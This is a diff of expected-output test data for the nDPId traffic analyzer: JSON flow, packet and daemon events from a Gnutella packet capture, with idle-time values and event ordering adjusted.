00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":243646,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4494,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -2640,8 +2640,6 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -2701,6 +2699,8 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":320292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320292,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4CAEAAIARw78KAAIPcHfybnAJ6ecAJJt6ZMkxArsJiWn\/2NtEIIr3AwABAAUAAADDglFLQA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4sK0AAIARXRsKAAIPMjruo3AJGcIAJO3IbAsxAnYtXYL\/8bz\/pBe7AwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA419wAAIARwSYKAAIPTL1I5nAJH+EAJBtk6eoxAtFG13r\/NLEu9DR8AwABAAUAAADDglFLQA=="} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3927,8 +3927,8 @@ 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":2,"flow_last_seen":599529,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":834,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":834,"pkt_l4_len":780,"thread_ts_msec":599529,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFAwwRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgMMdjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvQnllPC93c2E6QWN0aW9uPjx3c2E6TWVzc2FnZUlEPnVybjp1dWlkOjk4Zjc0ZjcxLTZkZmMtNDYxMi05YzNjLTVjNTgwZWI4MzU5Njwvd3NhOk1lc3NhZ2VJRD48d3NkOkFwcFNlcXVlbmNlIEluc3RhbmNlSWQ9IjQ2IiBTZXF1ZW5jZUlkPSJ1cm46dXVpZDo3NjczODllMC1lZTlhLTRjMWMtYjkwMi0yMGNiODFkMjAzZTAiIE1lc3NhZ2VOdW1iZXI9IjUiPjwvd3NkOkFwcFNlcXVlbmNlPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOkJ5ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDo3NDdmM2Q5Ni02OGE3LTQzZjEtOGNiZS1lOGQ2ZGFkZDAzNTg8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOkJ5ZT48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":2,"flow_last_seen":599747,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":599747,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOKkAAAAAQMAAAD\/AgAAAAAAAAAAAAAAAAAM"} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7490,"source":"gnutella.pcap","alias":"nDPId-test","packets-captured":7490,"packets-processed":7468,"total-skipped-flows":0,"total-l4-data-len":3617715,"total-not-detected-flows":547,"total-guessed-flows":4,"total-detected-flows":98,"total-detection-updates":3,"total-updates":290,"current-active-flows":169,"total-active-flows":801,"total-idle-flows":632,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3929,"global_ts_msec":600247} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312956,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"67.193.8.52","src_port":28681,"dst_port":38584,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312956,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"67.193.8.52","src_port":28681,"dst_port":38584,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72852,"flow_last_seen":431829,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.231.73.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3945,22 +3945,22 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82062,"flow_last_seen":491979,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.15.182","src_port":28681,"dst_port":37829,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.23.75.69","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.23.75.69","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":180000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 